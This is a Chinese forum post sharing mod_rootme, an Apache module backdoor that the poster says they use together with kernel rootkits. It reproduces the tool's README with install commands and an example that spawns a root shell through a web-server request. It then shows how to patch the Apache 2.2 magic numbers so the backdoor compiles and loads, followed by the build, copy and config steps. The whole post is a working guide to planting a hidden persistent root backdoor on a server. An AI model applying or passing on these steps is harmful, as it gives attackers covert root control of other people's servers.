linux rootkit apache mod_rootme 端口复用

2013-11-13 15:55:05 9 7171


没办法又开放封号了。。就转发下这后门我一直在用这挺不错的。。配合其他的rootkit来隐藏进程(sk13,LKM rootkit)
这是一个apache的模块化后门,以 pipe 的方式获得 shell,支持 tty,但是进程不能隐藏

首先看一下该rootkit的结构

[email protected]:~/Tmp# ls
mod_rootme-0.4.tar.gz
[email protected]:~/Tmp# tar -zxvf mod*tar.gz
mod_rootme-0.4/
mod_rootme-0.4/mrm_client.c
mod_rootme-0.4/mod_rootme.c
mod_rootme-0.4/httpd13.h
mod_rootme-0.4/Makefile32
mod_rootme-0.4/mod_rootme22.c
mod_rootme-0.4/mod_rootme2.c
mod_rootme-0.4/client.exe
mod_rootme-0.4/mrm_server.h
mod_rootme-0.4/Makefile
mod_rootme-0.4/httpd20.h
mod_rootme-0.4/README.txt
mod_rootme-0.4/httpd22.h
[email protected]:~/Tmp# ls
mod_rootme-0.4 mod_rootme-0.4.tar.gz
[email protected]:~/Tmp# cd mod*
[email protected]:~/Tmp/mod_rootme-0.4# ls
client.exe httpd20.h Makefile mod_rootme22.c mod_rootme.c mrm_server.h
httpd13.h httpd22.h Makefile32 mod_rootme2.c mrm_client.c README.txt
[email protected]:~/Tmp/mod_rootme-0.4#

看一下README.txt文件



mod_rootme: making Apache almost as insecure as IIS 5

What’s new in v0.4
——————

* added support for Apache 2.2.x

* Added Makefile32 that compiles 32-bit, meant for use on 64-bit
systems. (Linux only, because I haven’t tested it elsewhere)

What’s new in v0.3
——————

* fully functionnal shell with ssh-like pty support.

* ported to more unix flavors (*BSD, SunOS, OSF, etc.)

* client/server code and apache headers cleanup.

What’s new in v0.2
——————

* added full support for Apache 2.0.x

* added AP13/EAPI magic cookie support.

* master process properly exits when the
apache server is shutting down.

Installing mod_rootme
———————

Note: when starting apache, if you get the message
“mod_rootme.so uses plain Apache 1.3 API, this module
might crash under EAPI!”, you have to edit mod_rootme.c
and replace COOKIE_AP13 with COOKIE_EAPI.

-=[ Target: Apache 1.3.x (Debian) ]=-

# make <system>
# cp mod_rootme.so /usr/lib/apache/1.3/
# vi /etc/apache/httpd.conf (or modules.conf)
[...]
LoadModule rootme_module /usr/lib/apache/1.3/mod_rootme.so

# apachectl restart

-=[ Target: Apache 1.3.x (local ) ]=-

# make <system>
# cp mod_rootme.so /usr/local/apache/libexec/
# vi /usr/local/apache/conf/httpd.conf
[...]
LoadModule rootme_module libexec/mod_rootme.so
[...]
AddModule mod_rootme.c

# /usr/local/apache/bin/apachectl restart

-=[ Target: Apache 2.0.x (Debian) ]=-

# make <system>
# cp mod_rootme2.so /usr/lib/apache2/modules/
# cat > /etc/apache2/mods-enabled/rootme2.load
LoadModule rootme2_module /usr/lib/apache2/modules/mod_rootme2.so
^D
# apache2ctl stop; apache2ctl start

-=[ Target: Apache 2.0.x (local ) ]=-

# make <system>
# cp mod_rootme2.so /usr/local/apache2/modules/
# vi /usr/local/apache2/conf/httpd.conf
[...]
LoadModule rootme2_module modules/mod_rootme2.so

# PATH=/usr/local/apache2/bin:$PATH; export PATH
# apachectl stop; apachectl start

-=[ Target: Apache 2.2.x (Debian) ]=-

# make <system>
# cp mod_rootme22.so /usr/lib/apache2/modules/
# cat > /etc/apache2/mods-enabled/rootme22.load
LoadModule rootme2_module /usr/lib/apache2/modules/mod_rootme22.so
^D
# apache2ctl stop; apache2ctl start

-=[ Target: Apache 2.2.x (local ) ]=-

# make <system>
# cp mod_rootme22.so /usr/local/apache2/modules/
# vi /usr/local/apache2/conf/httpd.conf
[...]
LoadModule rootme2_module modules/mod_rootme22.so

# PATH=/usr/local/apache2/bin:$PATH; export PATH
# apachectl stop; apachectl start

Using mod_rootme
—————-

Make sure you have netcat installed on your system
(the telnet client will not work for this purpose)

$ nc 192.168.2.20 80
GET root
rootme-0.3 ready
id
uid=0(root) gid=1(other)
uname -a
SunOS atlas 5.8 Generic_108528-07 sun4u sparc SUNW,UltraAX-i2
stty
stty: : Invalid argument
exit

You can also use the bundled client to get a somewhat
more comfortable rootshell:

./client 192.168.2.20
rootme-0.3 ready
[email protected]:~ # ps
PID TTY TIME CMD
2314 pts/2 0:00 bash
2316 pts/2 0:00 ps
[email protected]:~ # stty
speed 9600 baud; -parity
rows = 25; columns = 80; ypixels = 0; xpixels = 0;
swtch = <undef>;
brkint -inpck -istrip icrnl -ixany imaxbel onlcr tab3
echo echoe echok echoctl echoke iexten
[email protected]:~ # exit

To run the prebuilt client.exe you’ll need cygwin1.dll from
http://www.cygwin.com or http://devine.nerim.net/cygwin1.dll

先做好安装前情报搜集工作

Debian系的apache配置文件:

/etc/apache2/apache2.conf
/etc/apache2/ports.conf

查看apache的版本号:

[email protected]:/etc/apache2# apache2 -v
Server version: Apache/2.2.14 (Ubuntu)
Server built: Nov 6 2012 20:40:59



debian系的apache模块路径:

[email protected]:/usr/lib/apache2/modules# ls
httpd.exp mod_authn_dbd.so mod_authz_owner.so mod_dav_lock.so mod_ext_filter.so mod_log_forensic.so mod_proxy_http.so mod_substitute.so
libphp5.so mod_authn_dbm.so mod_authz_user.so mod_dav.so mod_file_cache.so mod_mem_cache.so mod_proxy_scgi.so mod_suexec.so
mod_actions.so mod_authn_default.so mod_autoindex.so mod_dbd.so mod_filter.so mod_mime_magic.so mod_proxy.so mod_unique_id.so
mod_alias.so mod_authn_file.so mod_cache.so mod_deflate.so mod_headers.so mod_mime.so mod_reqtimeout.so mod_userdir.so
mod_asis.so mod_authnz_ldap.so mod_cern_meta.so mod_dir.so mod_ident.so mod_negotiation.so mod_rewrite.so mod_usertrack.so
mod_auth_basic.so mod_authz_dbm.so mod_cgid.so mod_disk_cache.so mod_imagemap.so mod_proxy_ajp.so mod_setenvif.so mod_version.so
mod_auth_digest.so mod_authz_default.so mod_cgi.so mod_dumpio.so mod_include.so mod_proxy_balancer.so mod_speling.so mod_vhost_alias.so
mod_authn_alias.so mod_authz_groupfile.so mod_charset_lite.so mod_env.so mod_info.so mod_proxy_connect.so mod_ssl.so
mod_authn_anon.so mod_authz_host.so mod_dav_fs.so mod_expires.so mod_ldap.so mod_proxy_ftp.so mod_status.so

这个rootkit在apache 2.2.*会报错

问题好像是magic字段引起的

在真正激活模块之前,Apache会检查所加载的模块是否为真正的Apache模块, 这个检测是通过检查module结构体中的magic字段实现的。 而magic字段是通过宏STANDARD20_MODULE_STUFF体现,在这个宏中magic的值为MODULE_MAGIC_COOKIE, MODULE_MAGIC_COOKIE定义如下:

1        #define MODULE_MAGIC_COOKIE 0x41503232UL /* "AP22" */
找到httpd22.h
将:
#define MODULE_MAGIC_COOKIE 0x41503230UL
改为:
#define MODULE_MAGIC_COOKIE 0x41503232UL
接下来编译一下:
[email protected]:~/Tmp/mod_rootme-0.4# make linux
gcc -s -fPIC -shared mod_rootme.c -o mod_rootme.so -lutil -DLINUX
gcc -s -fPIC -shared mod_rootme2.c -o mod_rootme2.so -lutil -DLINUX
gcc -s -fPIC -shared mod_rootme22.c -o mod_rootme22.so -lutil -DLINUX
gcc -s mrm_client.c -o client
[email protected]:~/Tmp/mod_rootme-0.4#

移动文件到apache2模块目录下

[email protected]:~/Tmp/mod_rootme-0.4# cp mod_rootme22.so /usr/lib/apache2/modules
[email protected]:~/Tmp/mod_rootme-0.4# ls /usr/lib/apache2/modules |grep mod_rootme22.so
mod_rootme22.so
[email protected]:~/Tmp/mod_rootme-0.4#

修改apche配置文件:

[email protected]:/etc/apache2# ls
apache2.conf conf.d envvars httpd.conf magic mods-available mods-enabled ports.conf sites-available sites-enabled
[email protected]:/etc/apache2# cp apache2.conf apache2.conf.bak
[email protected]:/etc/apache2# ls
apache2.conf apache2.conf.bak conf.d envvars httpd.conf magic mods-available mods-enabled ports.conf sites-available sites-enabled
[email protected]:/etc/apache2# gedit apache2.conf

在文件尾部添加:

LoadModule rootme22_module /usr/lib/apache2/modules/mod_rootme22.so

保存,重启httpd服务:

[email protected]:/etc/apache2# /etc/init.d/apache2 restart
* Restarting web server apache2 apache2: Syntax error on line 238 of /etc/apache2/apache2.conf: Module “mod_rootme22.c” is not compatible with this version of Apache (found 20020903, need 20051115). Please contact the vendor for the correct version.

重新打开httpd22.h

将:

#define MODULE_MAGIC_NUMBER_MAJOR 20020903

改为:

#define MODULE_MAGIC_NUMBER_MAJOR 20051115

重新编译安装



如图,安装成功

启动另一台服务器:







具體參考
http://fuzzexp.org/about-mod_rootme-point-out-the-things.html
http://www.nowamagic.net/librarys/veda/detail/1293

參考文檔:

http://people.apache.org/~rpluem/patches/forcerecovery_2.2.diff

http://svn.apache.org/repos/asf/httpd/httpd/branches/2.2.x/include/ap_mmn.h

http://forums.devshed.com/apache-development-15/api-structure-php5-module-in-file-usr-local-apache2-modules-326634.html

http://www.nowamagic.net/librarys/veda/detail/1293

http://blog.sina.com.cn/s/blog_5546a5ad01010fyn.html

http://linux.chinaunix.net/techdoc/net/2007/10/07/969337.shtml

关于作者

评论9次

要评论?请先  登录  或  注册